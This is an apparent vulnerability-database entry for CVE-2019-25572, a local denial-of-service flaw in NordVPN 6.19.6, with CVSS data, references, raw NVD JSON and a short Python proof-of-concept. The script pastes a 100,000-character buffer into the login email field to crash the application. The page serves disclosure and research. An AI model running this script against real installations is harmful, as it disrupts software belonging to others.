CVE-2019-25572

Description

NordVPN 6.19.6 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the email input field. Attackers can paste a buffer of 100,000 characters into the email field during login to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:nordvpn:nordvpn:*:*:*:*:*:windows:*:* - VULNERABLE

NordVPN 6.19.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pyautogui
import pyperclip
import time

# Generate the payload: a buffer of 100,000 characters
# This mimics the exploit described in the vulnerability report
payload = "A" * 100000

def exploit_nordvpn_dos():
    print("[+] Copying payload to clipboard...")
    pyperclip.copy(payload)
    
    print("[!] WARNING: This will crash the NordVPN application.")
    print("[+] Please switch to the NordVPN login window within 5 seconds...")
    time.sleep(5)
    
    # Simulate the user interaction to paste the payload into the email field
    # Assuming the cursor is focused on the email input field
    print("[+] Pasting payload into the email field...")
    pyautogui.hotkey('ctrl', 'v')
    
    print("[+] Payload delivered. Application should crash shortly.")

if __name__ == "__main__":
    exploit_nordvpn_dos()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25572
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25572
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25572/
[4] VulDB https://vuldb.com/cve/CVE-2019-25572
[5] https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
[6] https://nordvpn.com/
[7] https://www.exploit-db.com/exploits/46343
[8] https://www.vulncheck.com/advisories/nordvpn-denial-of-service-via-email-field-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25572", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:21.200", "lastModified": "2026-04-15T17:12:40.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NordVPN 6.19.6 contains a denial of service vulnerability that allows local attackers to crash the application by submitting an excessively long string in the email input field. Attackers can paste a buffer of 100,000 characters into the email field during login to trigger an application crash."}, {"lang": "es", "value": "NordVPN 6.19.6 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales provocar un fallo en la aplicación al enviar una cadena excesivamente larga en el campo de entrada de correo electrónico. Los atacantes pueden pegar un búfer de 100.000 caracteres en el campo de correo electrónico durante el inicio de sesión para provocar un fallo en la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1260"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nordvpn:nordvpn:*:*:*:*:*:windows:*:*", "versionEndIncluding": "6.19.6", "matchCriteriaId": "C912F120-836D-4BC2-B181-D241D636412A"}]}]}], "references": [{"url": "https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://nordvpn.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46343", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/nordvpn-denial-of-service-via-email-field-buffer-overflow", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}